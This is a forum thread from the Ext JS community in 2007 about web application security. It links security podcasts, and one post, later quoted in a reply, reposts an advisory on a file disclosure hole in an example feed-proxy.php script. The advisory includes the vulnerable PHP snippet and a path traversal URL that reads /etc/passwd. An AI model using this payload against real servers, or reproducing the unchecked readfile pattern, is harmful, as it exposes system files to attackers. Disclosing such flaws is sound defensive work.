1. #1
    jay@moduscreate.com's Avatar
    Join Date
    Mar 2007
    Location
    Frederick MD, NYC, DC
    Posts
    16,353
    Vote Rating
    77
    jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all

      0  

    Default Web app developers, think security !!

    Web app developers, think security !!


    If you have time, please listen to these podcasts!


    http://www.grc.com/securitynow.htm

    http://media.grc.com/sn/SN-085.mp3 -- Intro to code injection on the web
    http://media.grc.com/sn/SN-086.mp3 -- XSS (Cross site scripting)
    http://media.grc.com/sn/SN-087.mp3 -- SQL injection

  2. #2
    Ext User potdarko's Avatar
    Join Date
    Mar 2007
    Posts
    40
    Vote Rating
    0
    potdarko is on a distinguished road

      0  

    Default XSS Attacks

    XSS Attacks


    Thanks for the links. Jeremiah Grossman's book on XSS attacks is almost ready to hit the shelves. Hope RSnake does one too ... speaking of books.. how's the Ext book going? J/K

  3. #3
    Ext User potdarko's Avatar
    Join Date
    Mar 2007
    Posts
    40
    Vote Rating
    0
    potdarko is on a distinguished road

      0  

    Default ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure

    ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure


    Posted at www.milw0rm.com:

    Alpha1 has a Remote File Disclosure. (by Alkomandoz Hacker)

    In /examples/layout/feed-proxy.php

    ----------------------------------------------------------

    header('Content-Type: text/xml');
    readfile($feed);
    return;
    }
    ?>

    ----------------------------------------------------------

    # Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=../../../../../../etc/passwd
    Last edited by potdarko; 25 Apr 2007 at 7:40 AM. Reason: added urls

  4. #4
    jay@moduscreate.com's Avatar
    Join Date
    Mar 2007
    Location
    Frederick MD, NYC, DC
    Posts
    16,353
    Vote Rating
    77
    jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all

      0  

    Default


    yeah, something to think about. good post.

  5. #5
    Ext User potdarko's Avatar
    Join Date
    Mar 2007
    Posts
    40
    Vote Rating
    0
    potdarko is on a distinguished road

      0  

    Default :) he's right

    :) he's right


    I hope rezn doesn't mind me quoting him here, but his post @ sla.ckers.org 's forum is... so true.

    I just poked around myself here: [extjs.com] and I have to admit that the examples are really, really, nice. And it makes me happy that you all think forcing users to diasble JS is a ridiculous idea, cause having it around sure makes hacking more fun.
    Extjs is loved by all, whatever the reason
    Last edited by potdarko; 30 Apr 2007 at 6:44 PM. Reason: fixed my cat's CRs
    Miguel Benevides
    miguel.benevides@webidente.com
    my del.icio.us
    "I hope that when the world comes to an end, I can breathe a sigh of relief, because there will be so much to look forward to."

  6. #6
    Sencha - Community Support Team JeffHowden's Avatar
    Join Date
    Mar 2007
    Location
    Forest Grove, OR
    Posts
    1,038
    Vote Rating
    1
    JeffHowden is on a distinguished road

      0  

    Default


    Quote Originally Posted by potdarko View Post
    Posted at www.milw0rm.com:

    Alpha1 has a Remote File Disclosure. (by Alkomandoz Hacker)

    In /examples/layout/feed-proxy.php

    ----------------------------------------------------------

    header('Content-Type: text/xml');
    readfile($feed);
    return;
    }
    ?>

    ----------------------------------------------------------

    # Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=../../../../../../etc/passwd
    The server-side scripts provided are offered as a convenience, not as a indicator of how things should be done server-side.
    Jeff Howden
    Ext JS - Support Team Volunteer
    jeff@extjs.com

    Any and all code samples that are authored by me and posted on the Ext forums or website are hereby released into the public domain and I release anyone or entity of liability by using said code samples unless explicitly stated otherwise.

    Opinions are mine and not necessarily endorsed by Ext, LLC. Please do not contact me directly for assistance unless requested by me.

  7. #7
    Ext User
    Join Date
    Mar 2007
    Posts
    90
    Vote Rating
    0
    Herm is on a distinguished road

      0  

    Default


    You can now use the public proxy provided by the Google here http://code.google.com/apis/ajaxfeeds/. They say "The AJAX Feed API lets you download any public Atom or RSS feed using only JavaScript, so you can easily mash up feeds with your content and other APIs."

  8. #8
    jay@moduscreate.com's Avatar
    Join Date
    Mar 2007
    Location
    Frederick MD, NYC, DC
    Posts
    16,353
    Vote Rating
    77
    jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all jay@moduscreate.com is a name known to all

      0  

    Default


    that's insane.

    it's open to too many things. I mean they're Bypassing XHR Restrictions to only allow data to be retrieved from the originating host.

  9. #9
    Ext User
    Join Date
    Mar 2007
    Posts
    90
    Vote Rating
    0
    Herm is on a distinguished road

      0  

    Default


    You can do cross site as much as you want without anything else but Ext.Data.StriptTagProxy.

    Google is safer though because as a developer you're saying (to the app you wrote and deployed to the client's browser): "hey, get my data from my server and my 3rd party data from the google server". As a developer, you're a) protecting your server infrastructure from being exploited and b)protecting your user by not having to send them to 3rd party sites.